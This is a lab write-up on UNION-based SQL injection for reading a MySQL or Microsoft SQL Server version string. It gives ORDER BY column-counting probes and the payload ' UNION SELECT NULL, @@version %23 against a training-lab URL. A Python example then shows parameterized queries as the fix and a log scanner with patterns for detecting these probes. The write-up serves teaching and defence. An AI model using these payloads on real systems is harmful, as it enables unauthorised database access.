Lab 8: SQL injection attack, querying the database type and version on MySQL and Microsoft

Problem Statement:

This lab contains an SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.

To solve the lab, display the database version string.

Requirement:

Make the database retrieve the string: '8.0.31-0ubuntu0.20.04.2'

Understanding: Different Database Syntax

Database versions:

You can query the database to determine its type and version. This information is useful when formulating more complicated attacks.

Oracle        SELECT banner FROM v$version    SELECT version FROM v$instance
Microsoft     SELECT @@version
PostgreSQL    SELECT version()
MySQL         SELECT @@version

Comments:

You can use comments to truncate a query and remove the portion of the original query that follows your input.

Oracle        --comment
Microsoft     --comment    /*comment*/
PostgreSQL    --comment    /*comment*/
MySQL         #comment     -- comment [Note the space after the double dash]    /*comment*/

Steps to resolve this lab:

Note:

  • To solve this lab in the browser itself, we have to encode the # character. Otherwise the browser treats # as the start of a URL fragment and never sends it to the server.
  • In MySQL we can comment using several methods: --, # or /* */.
  1. First find out how many columns there are, using the ORDER BY clause.

Crafting the URL: https://0a5e005304714149c2736206009700cf.web-security-academy.net/filter?category=Pets

We are using the # character to comment out the rest of the original query.

Note: the browser would treat # as a URL fragment and drop it, so we encode it as %23.

At the end of the URL type

  1. ' ORDER BY 1 %23
  2. ' ORDER BY 2 %23

Increase the number until the query errors; the highest value that still returns results is the number of columns in the original query.

  2. Next, craft the payload to retrieve the version.

' UNION SELECT NULL, @@version %23

This is how the query looks on the database side (MySQL). The version string is returned in the second column of the product listing.

The same payload works on Microsoft SQL Server as well, since both dialects expose the version through @@version.
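As an added example (not code from the lab or from the original write-up), the following Python shows the root cause of the lab and its defensive counterparts: what the category parameter looks like once the server URL-decodes %23 back to #, how string concatenation lets that value reach the database verbatim while a bound parameter does not, and a small access-log check that flags the ORDER BY and UNION SELECT probes used above. The table layout, function names and log lines are constructed assumptions, and sqlite3 stands in for MySQL only so that the parameterized query can run offline.

```python
"""Added example (not part of the original write-up). All table columns,
function names and log lines are constructed for illustration."""
from urllib.parse import urlsplit, parse_qs
import re
import sqlite3


def build_query_unsafe(category: str) -> str:
    # Vulnerable pattern: the filter value is concatenated into the SQL text,
    # so a quote, an ORDER BY or a UNION in it becomes part of the statement.
    # Returned as a string only to make the resulting SQL visible.
    return f"SELECT name, description FROM products WHERE category = '{category}'"


def sample_db() -> sqlite3.Connection:
    # Constructed two-column product listing, matching the lab's column count.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, description TEXT, category TEXT)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [("Dog bed", "Soft", "Pets"), ("Spatula", "Steel", "Kitchen")],
    )
    return conn


def run_query_safe(conn: sqlite3.Connection, category: str) -> list:
    # Hardened pattern: a bound parameter. The driver passes the value
    # separately from the SQL text, so quotes, comments and UNION keywords
    # are compared as literal data and never change the statement.
    cur = conn.execute(
        "SELECT name, description FROM products WHERE category = ?", (category,)
    )
    return cur.fetchall()


def category_from_url(url: str) -> str:
    # Decode the request the way the server does: '+' becomes a space and
    # %23 becomes '#', the character the browser would otherwise have kept
    # as a fragment and never sent.
    qs = parse_qs(urlsplit(url).query)
    return qs.get("category", [""])[0]


# Indicators matching the two probing steps described in the write-up.
_PROBE_PATTERNS = [
    ("order-by-probe", re.compile(r"'\s*ORDER\s+BY\s+\d+", re.I)),
    ("union-select", re.compile(r"'\s*UNION\s+SELECT\b", re.I)),
    ("comment-truncation", re.compile(r"(#|--\s|/\*)")),
]


def classify_request(url: str) -> list:
    """Return the names of all indicators present in the category parameter."""
    cat = category_from_url(url)
    return [name for name, pat in _PROBE_PATTERNS if pat.search(cat)]


def scan_log(lines: list) -> list:
    """Return (request_path, findings) for every log line whose category
    parameter carries at least one injection indicator."""
    hits = []
    for line in lines:
        m = re.search(r'"GET (\S+) HTTP', line)
        if not m:
            continue
        findings = classify_request(m.group(1))
        if findings:
            hits.append((m.group(1), findings))
    return hits


# Constructed access-log lines (not real traffic) mirroring the steps above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00] "GET /filter?category=Pets HTTP/1.1" 200',
    '10.0.0.9 - - [01/Jan/2024:10:00:01] "GET /filter?category=Pets\'+ORDER+BY+1+%23 HTTP/1.1" 200',
    '10.0.0.9 - - [01/Jan/2024:10:00:02] "GET /filter?category=Pets\'+ORDER+BY+3+%23 HTTP/1.1" 500',
    '10.0.0.9 - - [01/Jan/2024:10:00:03] "GET /filter?category=Pets\'+UNION+SELECT+NULL,@@version+%23 HTTP/1.1" 200',
]


if __name__ == "__main__":
    injected = category_from_url(
        "https://example.test/filter?category=Pets'+UNION+SELECT+NULL,@@version+%23"
    )
    print("Database sees:", build_query_unsafe(injected))
    print("Parameterized lookup returns:", run_query_safe(sample_db(), injected))
    for path, findings in scan_log(SAMPLE_LOG):
        print(path, "->", ", ".join(findings))
```

The ORDER BY probe is worth alerting on even though it is harmless by itself: a run of ORDER BY requests with increasing numbers from one client, ending in a 500, is the column-counting step that precedes the UNION payload.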